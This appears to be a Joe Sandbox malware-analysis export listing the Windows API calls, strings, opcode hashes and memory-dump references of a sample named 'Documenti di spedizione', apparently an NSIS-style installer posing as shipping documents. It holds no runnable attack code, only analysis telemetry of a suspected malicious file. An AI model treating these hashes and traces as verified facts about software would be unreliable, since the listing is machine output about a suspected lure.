                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                  • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                  APIs
                                                  • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                  • lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                  • lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                  • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction ID: 5626e068ca8b5f19a977ecdc4b6aac72793d852c885f634865ceb3a8b40a731b
                                                  • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction Fuzzy Hash: 6F218E71900558FACB119F65DD849CFBFB9EF45350F10803AF904B62A0C7794A819F68
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                  • GetTickCount.KERNEL32 ref: 0040308C
                                                  • wsprintfW.USER32 ref: 004030BA
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                  • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                    • Part of subcall function 00403037: MulDiv.KERNEL32(00000000,00000064,0006298B), ref: 0040304C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction ID: 97c902a025ac2946b461c4c6cbd0392064296d6115d029b2f7da86e316ad9030
                                                  • Opcode Fuzzy Hash: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                  • Instruction Fuzzy Hash: 5901A530542320EBCB31AF60AE0AA6B7F6CAB00702F54443BF441B15D5CAB84641CB9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                  • GetMessagePos.USER32 ref: 00404FFF
                                                  • ScreenToClient.USER32(?,?), ref: 00405019
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                  • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                  • wsprintfW.USER32 ref: 0040300A
                                                  • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction ID: bec97a1ff423586d6a5c987b60c5c02bd53578e49ae90ce5674df69195bed5dc
                                                  • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                  • Instruction Fuzzy Hash: 98F0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AF646B51D0DBB99A558F99
                                                  APIs
                                                    • Part of subcall function 73D812BB: GlobalAlloc.KERNELBASE(00000040,?,73D812DB,?,73D8137F,00000019,73D811CA,-000000A0), ref: 73D812C5
                                                  • GlobalFree.KERNEL32(?), ref: 73D82743
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D82778
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 1ca5f20a4fa73da2c023538599f28484935348a62f0ff91e1a625e2cb0bd3b88
                                                  • Instruction ID: 5a676c4a8703727d603e0ef49164c2e5a641878541b4a64a519c0fa2e87a7dc6
                                                  • Opcode Fuzzy Hash: 1ca5f20a4fa73da2c023538599f28484935348a62f0ff91e1a625e2cb0bd3b88
                                                  • Instruction Fuzzy Hash: A9310273514209EFD7169F62CD88FEB7BBBFB853103244129F146A7250E73478248B66
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                  • Instruction ID: 349357d0e6511a5e46fd8e19636faeb724d9b15f10a4c99f70335ec2520be7da
                                                  • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                  • Instruction Fuzzy Hash: 2731B171D00124BBCF21AFA5DD89D9E7E79AF44364F14023AF415762E1CB794D418F68
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                  • wsprintfW.USER32 ref: 00404F78
                                                  • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H/B
                                                  • API String ID: 3540041739-2222257793
                                                  • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction ID: d50fdcff321319429c488fc01686433ffa638a32cb0890ada2b0e386a1fa8516
                                                  • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                  • Instruction Fuzzy Hash: 8B11A873A0412837DB00656D9D45E9E369C9B85374F154637FA26F31D1E979CC2182E8
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: 03de9e6c5feebe5761d768052ae7d176c7de5d19f69fdf9560eb97b73f8abf0d
                                                  • Instruction ID: 1e1e1766696cf6af10ea2e1d269e7af2810b7ee1fd8ce2ac7840459ee565fff9
                                                  • Opcode Fuzzy Hash: 03de9e6c5feebe5761d768052ae7d176c7de5d19f69fdf9560eb97b73f8abf0d
                                                  • Instruction Fuzzy Hash: AC51D772D00118ABDB039FACC4407DD7BBAFB56720F154159D406B3294F775BA8E87A1
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D825C2
                                                    • Part of subcall function 73D812CC: lstrcpynW.KERNEL32(00000000,?,73D8137F,00000019,73D811CA,-000000A0), ref: 73D812DC
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 73D82548
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73D82563
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 4216380887-0
                                                  • Opcode ID: 1fd221caa8e1609cb01e86ce0fa2f7bbf1de3fd7960d88b2884a02b0de9560c1
                                                  • Instruction ID: 6c8c5936e0df988be906dc6db9d4205f88059c2306f8c8523405ff5c8fae463e
                                                  • Opcode Fuzzy Hash: 1fd221caa8e1609cb01e86ce0fa2f7bbf1de3fd7960d88b2884a02b0de9560c1
                                                  • Instruction Fuzzy Hash: A441AAB2009309EFE715AF29D884BEA77B9FB54320F10495DE48AA6581FB34B548CB71
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                  • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                  • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                  • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                  • Instruction ID: 9dfadece7afb1d036d9df0696a088785edc369755c046bee68b18a74b307b48a
                                                  • Opcode Fuzzy Hash: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                  • Instruction Fuzzy Hash: DC213B72900119AFCF05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E76
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401EF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                  • Instruction ID: e238c2cdee3483520897b3d1e8694375d24364cfb31141c1d88cf39a281bb876
                                                  • Opcode Fuzzy Hash: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                  • Instruction Fuzzy Hash: 9D018871904250EFE7005BB4EE99BDD3FB4AF55301F20897AF142B61E2C6B904459BED
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73D822D8,?,00000808), ref: 73D816D5
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73D822D8,?,00000808), ref: 73D816DC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73D822D8,?,00000808), ref: 73D816F0
                                                  • GetProcAddress.KERNEL32(73D822D8,00000000), ref: 73D816F7
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D81700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: b00c50a3c3a9a9dfa11269868177bcc3bc95fb5159aa1fea9770c363a8e823ed
                                                  • Instruction ID: 3c293d6b58269b46321fb3fe25d950849c4357cb466784ecc5e5419222469b4b
                                                  • Opcode Fuzzy Hash: b00c50a3c3a9a9dfa11269868177bcc3bc95fb5159aa1fea9770c363a8e823ed
